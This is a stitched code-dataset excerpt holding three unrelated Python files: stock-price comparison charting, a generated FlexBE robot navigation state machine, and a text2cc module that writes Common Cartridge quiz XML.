except: pass def compare_charts(tickers = [], start = None, end = None, ma = 'yes'): if len(tickers) <= 1: raise Exception("Please enter at least two tickers to compare") def normalize_data(column): min = column.min() max = column.max() # time series normalization # y will be a column in a dataframe y = (column - min) / (max - min) return y def printmd(string): display(Markdown(string)) start_end_prices = {} closing_90_days = [] fig = go.Figure() for ticker in tickers: ticker_obj = yf.Ticker(ticker) ticker_hist = ticker_obj.history(period = 'max') if start and end: start_date, end_date = start, end else: start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1] frame = ticker_hist.loc[start_date:end_date].copy() frame['Norm Close'] = normalize_data(frame['Close']) closing_prices = frame['Norm Close'] start_end_prices[ticker] = {'start_price': frame.iloc[0]['Close'], 'end_price': frame.iloc[-1]['Close']} closing_90_days.append(closing_prices.iloc[-90:].to_frame().rename(columns = {'Norm Close': ticker})) fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = ticker + ' Norm Close')) if ma == 'yes': closing_prices_ma = frame['Norm Close'].rolling(7).mean() fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = ticker + '7D Close Moving Average')) fig.update_layout(title = ', '.join(tickers) + ' Comparison', yaxis_title = 'Norm Price') fig.update_layout(height = 600, xaxis=dict( rangeselector=dict( buttons=list([ dict(count=7, label="1w", step="day", stepmode="backward"), dict(count=1, label="1m", step="month", stepmode="backward"), dict(count=3, label="3m", step="month", stepmode="backward"), dict(count=6, label="6m", step="month", stepmode="backward"), dict(count=1, label="YTD", step="year", stepmode="todate"), dict(count=1, label="1y", step="year", stepmode="backward"), dict(step="all") ]) ), rangeslider=dict( visible=True, thickness = 0.1 ), type="date" ) ) fig.show() printmd('Given Timeframe:') for ticker in tickers: start_price, end_price = start_end_prices[ticker]['start_price'], start_end_prices[ticker]['end_price'] printmd(ticker + " Return: {:.2f}%".format((end_price - start_price)/start_price*100)) if len(tickers) > 2: concat_closing_90_days = pd.concat(closing_90_days, axis = 1) print('\n') printmd("Last 90 Days Close Pearson Correlation Matrix: ") display(concat_closing_90_days.corr()) fig2 = px.imshow(concat_closing_90_days.corr(), color_continuous_scale = 'blues', title = 'Last 90 Days Close Pearson Correlation Heatmap', width = 500, height = 400) fig2.show() else: fig2 = go.Figure() fig2.add_trace(go.Scatter(x = closing_90_days[0].loc[:, tickers[0]], y = closing_90_days[1].loc[:, tickers[1]], mode = 'markers', name = 'Norm Close')) fig2.update_layout(title = ', '.join(tickers) + ' Last 90 Days Correlation', xaxis_title = tickers[0], yaxis_title = tickers[1], width = 1000, height = 500) fig2.show() printmd("Pearson Correlation: " + str(round(closing_90_days[0].loc[:, tickers[0]].corr(closing_90_days[1].loc[:, tickers[1]]),3))) print() def plot_buysell_points(ticker, tradesdf, crypto = 'no'): trade_history = tradesdf[tradesdf['Symbol'] == ticker].reset_index(drop=True) if crypto == 'yes': ticker += '-USD' ticker_obj = yf.Ticker(ticker) ticker_hist = ticker_obj.history(period = 'max') if len(ticker_hist) == 0: return start_date = (pd.to_datetime(trade_history.loc[0, 'Date']) - timedelta(150)).strftime("%Y-%m-%d") today_date = date.today().strftime("%Y-%m-%d") frame = ticker_hist.loc[start_date:today_date] closing_prices = frame['Close'] fig = go.Figure() fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close')) for i in range(len(trade_history)): trade_date = trade_history.loc[i, 'Date'] price = trade_history.loc[i, 'Avg_Price'] quantity = trade_history.loc[i, 'Quantity'] total = trade_history.loc[i, 'Total'] side = trade_history.loc[i, 'Side'] gain = trade_history.loc[i, 'Gain'] perc_gain = trade_history.loc[i, '% Gain'] if side == 'buy': fig.add_annotation(x = trade_date, y = price, text = f'BB', showarrow = True, arrowhead = 1, ax = -0.5, ay = -30, arrowsize = 1.5, align = 'left', hovertext = f'B, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}') if side == 'sell': fig.add_annotation(x = trade_date, y = price, text = f'SS', showarrow = True, arrowhead = 1, ax = 20, ay = -30, arrowsize = 1.5, align = 'right', hovertext = f'S, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}, G: {gain}, %G: {perc_gain}') fig.update_layout(title = ticker, yaxis_title = 'Price') fig.show()
2.640625
3
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
0
5505
<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- ########################################################### # WARNING: Generated code! # # ************************** # # Manual changes may get lost if file is generated again. # # Only code inside the [MANUAL] tags will be kept. # ########################################################### from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger from flexbe_states.wait_state import WaitState from flexbe_navigation_states.turn_right_sm import turn_rightSM from flexbe_states.subscriber_state import SubscriberState from flexbe_utility_states.MARCO import Carbonara from flexbe_navigation_states.turn_left_sm import turn_leftSM from flexbe_navigation_states.go_straight_sm import go_straightSM from flexbe_navigation_states.obstacle_avoidance_sm import Obstacle_AvoidanceSM # Additional imports can be added inside the following tags # [MANUAL_IMPORT] # [/MANUAL_IMPORT] ''' Created on Sat Jul 18 2020 @author: TG4 ''' class NavigationSM(Behavior): ''' Integrated behaviour ''' def __init__(self): super(NavigationSM, self).__init__() self.name = 'Navigation' # parameters of this behavior # references to used behaviors self.add_behavior(turn_rightSM, 'turn_right') self.add_behavior(turn_leftSM, 'turn_left') self.add_behavior(go_straightSM, 'go_straight') self.add_behavior(go_straightSM, 'go_straight_2') self.add_behavior(go_straightSM, 'go_straight_3') self.add_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance') # Additional initialization code can be added inside the following tags # [MANUAL_INIT] # [/MANUAL_INIT] # Behavior comments: def create(self): # x:1683 y:419, x:605 y:337 _state_machine = OperatableStateMachine(outcomes=['finished', 'failed']) # Additional creation code can be added inside the following tags # [MANUAL_CREATE] # [/MANUAL_CREATE] with _state_machine: # x:58 y:69 OperatableStateMachine.add('w1', WaitState(wait_time=1), transitions={'done': 's1'}, autonomy={'done': Autonomy.Off}) # x:1090 y:488 OperatableStateMachine.add('turn_right', self.use_behavior(turn_rightSM, 'turn_right'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:55 y:196 OperatableStateMachine.add('s1', SubscriberState(topic='/darknet_ros/bounding_boxes', blocking=True, clear=False), transitions={'received': 'carb1', 'unavailable': 'w1'}, autonomy={'received': Autonomy.Off, 'unavailable': Autonomy.Off}, remapping={'message': 'detected'}) # x:286 y:212 OperatableStateMachine.add('carb1', Carbonara(), transitions={'none': 'go_straight', 'Obstacle': 'Obstacle_Avoidance', 'Left': 'go_straight_2', 'Right': 'go_straight_3'}, autonomy={'none': Autonomy.Off, 'Obstacle': Autonomy.Off, 'Left': Autonomy.Off, 'Right': Autonomy.Off}, remapping={'input_value': 'detected', 'Distance': 'Distance'}) # x:1180 y:246 OperatableStateMachine.add('w2', WaitState(wait_time=1), transitions={'done': 'w5'}, autonomy={'done': Autonomy.Off}) # x:1161 y:64 OperatableStateMachine.add('w5', WaitState(wait_time=1), transitions={'done': 'w1'}, autonomy={'done': Autonomy.Off}) # x:958 y:119 OperatableStateMachine.add('turn_left', self.use_behavior(turn_leftSM, 'turn_left'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:906 y:276 OperatableStateMachine.add('go_straight', self.use_behavior(go_straightSM, 'go_straight'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:679 y:118 OperatableStateMachine.add('go_straight_2', self.use_behavior(go_straightSM, 'go_straight_2'), transitions={'finished': 'turn_left', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:715 y:484 OperatableStateMachine.add('go_straight_3', self.use_behavior(go_straightSM, 'go_straight_3'), transitions={'finished': 'turn_right', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:381 y:495 OperatableStateMachine.add('Obstacle_Avoidance', self.use_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance'), transitions={'finished': 's1', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) return _state_machine # Private functions can be added inside the following tags # [MANUAL_FUNC] # [/MANUAL_FUNC]
1.890625
2
text2cc/xml_assessment.py
dlehman83/text2cc
1
5506
# -*- coding: utf-8 -*- # # Copyright (c) 2021, <NAME> # Copyright (c) 2020, <NAME> # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion BEFORE_ITEMS = '''\ <?xml version="1.0" encoding="UTF-8"?> <questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd"> <assessment ident="{assessment_identifier}" title="{title}"> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_maxattempts</fieldlabel> <fieldentry>1</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> cc_profile </fieldlabel> <fieldentry> cc.exam.v0p1 </fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> qmd_assessmenttype </fieldlabel> <fieldentry> Examination </fieldentry> </qtimetadatafield> </qtimetadata> <section ident="root_section"> ''' AFTER_ITEMS = '''\ </section> </assessment> </questestinterop> ''' GROUP_START = '''\ <section ident="{ident}" title="{group_title}"> <selection_ordering> <selection> <selection_number>{pick}</selection_number> <selection_extension> <points_per_item>{points_per_item}</points_per_item> </selection_extension> </selection> </selection_ordering> ''' GROUP_END = '''\ </section> ''' TEXT = '''\ <item ident="{ident}" title="{text_title_xml}"> <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>text_only_question</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>0</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry></fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> <presentation> <material> <mattext texttype="text/html">{text_html_xml}</mattext> </material> </presentation> </item> ''' START_ITEM = '''\ <item ident="{question_identifier}" title="{question_title}"> ''' END_ITEM = '''\ </item> ''' ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\ <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>{question_type}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>{points_possible}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry>{original_answer_ids}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> ''' ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '') ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY ITEM_PRESENTATION_MCTF = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_lid ident="response1" rcardinality="Single"> <render_choice> {choices} </render_choice> </response_lid> </presentation> ''' ITEM_PRESENTATION_MCTF_CHOICE = '''\ <response_label ident="{ident}"> <material> <mattext texttype="text/html">{choice_html_xml}</mattext> </material> </response_label>''' ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple') ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE ITEM_PRESENTATION_SHORTANS = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_ESSAY = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_UPLOAD = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> </presentation> ''' ITEM_PRESENTATION_NUM = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib fibtype="Decimal"> <response_label ident="answer1"/> </render_fib> </response_str> </presentation> ''' ITEM_RESPROCESSING_START = '''\ <resprocessing> <outcomes> <decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/> </outcomes> ''' ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{answer_xml}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\ <varequal respident="response1">{answer_xml}</varequal>''' ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\ <varequal respident="response1">{ident}</varequal>''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\ <not> <varequal respident="response1">{ident}</varequal> </not>''' ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY = '''\ <respcondition continue="No"> <conditionvar> <other/> </conditionvar> </respcondition> ''' ITEM_RESPROCESSING_END = '''\ </resprocessing> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\ <itemfeedback ident="general_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\ <itemfeedback ident="correct_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\ <itemfeedback ident="general_incorrect_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\ <itemfeedback ident="{ident}_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str: ''' Generate assessment XML from Quiz. ''' xml = [] xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier, title=title_xml)) for question_or_delim in quiz.questions_and_delims: if isinstance(question_or_delim, TextRegion): xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}', text_title_xml=question_or_delim.title_xml, assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}', text_html_xml=question_or_delim.text_html_xml)) continue if isinstance(question_or_delim, GroupStart): xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}', group_title=question_or_delim.group.title_xml, pick=question_or_delim.group.pick, points_per_item=question_or_delim.group.points_per_question)) continue if isinstance(question_or_delim, GroupEnd): xml.append(GROUP_END) continue if not isinstance(question_or_delim, Question): raise TypeError question = question_or_delim xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}', question_title=question.title_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices) elif question.type == 'numerical_question': item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = f'text2qti_numerical_{question.id}' elif question.type == 'essay_question': item_metadata = ITEM_METADATA_ESSAY original_answer_ids = f'text2qti_essay_{question.id}' elif question.type == 'file_upload_question': item_metadata = ITEM_METADATA_UPLOAD original_answer_ids = f'text2qti_upload_{question.id}' else: raise ValueError #Type Change for Schoology CC Import if question.type == 'multiple_choice_question': typechange = 'cc.multiple_choice.v0p1' elif question.type == 'true_false_question': typechange = 'cc.true_false.v0p1' elif question.type == 'short_answer_question': typechange = 'cc.fib.v0p1' elif question.type == 'multiple_answers_question': typechange = 'cc.multiple_response.v0p1' elif question.type == 'essay_question': typechange = 'cc.essay.v0p1' else: typechange = question.type xml.append(item_metadata.format(question_type=typechange, points_possible=question.points_possible, original_answer_ids=original_answer_ids, assessment_question_identifierref=f'text2qti_question_ref_{question.id}')) if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'): if question.type in ('true_false_question', 'multiple_choice_question'): item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE item_presentation = ITEM_PRESENTATION_MCTF elif question.type == 'multiple_answers_question': item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE item_presentation = ITEM_PRESENTATION_MULTANS else: raise ValueError choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml) for c in question.choices) xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices)) elif question.type == 'short_answer_question': xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml)) elif question.type == 'numerical_question': xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml)) elif question.type == 'essay_question': xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml)) elif question.type == 'file_upload_question': xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml)) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question'): correct_choice = None for choice in question.choices: if choice.correct: correct_choice = choice break if correct_choice is None: raise TypeError resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) else: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'short_answer_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml)) varequal = [] for choice in question.choices: varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml)) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'multiple_answers_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) varequal = [] for choice in question.choices: if choice.correct: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}')) else: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'numerical_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK) if question.correct_feedback_raw is None: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK else: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml, num_exact=question.numerical_exact_html_xml, num_max=question.numerical_max_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'essay_question': xml.append(ITEM_RESPROCESSING_START) xml.append(ITEM_RESPROCESSING_ESSAY) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'file_upload_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question', 'numerical_question', 'essay_question', 'file_upload_question'): if question.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml)) if question.correct_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): for choice in question.choices: if choice.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}', feedback=choice.feedback_html_xml)) xml.append(END_ITEM) xml.append(AFTER_ITEMS) return ''.join(xml)
1.78125
2
tests/test_aggregate_stats_design.py
bids-standard/bids-statsmodels-design-synthesizer
0
5507
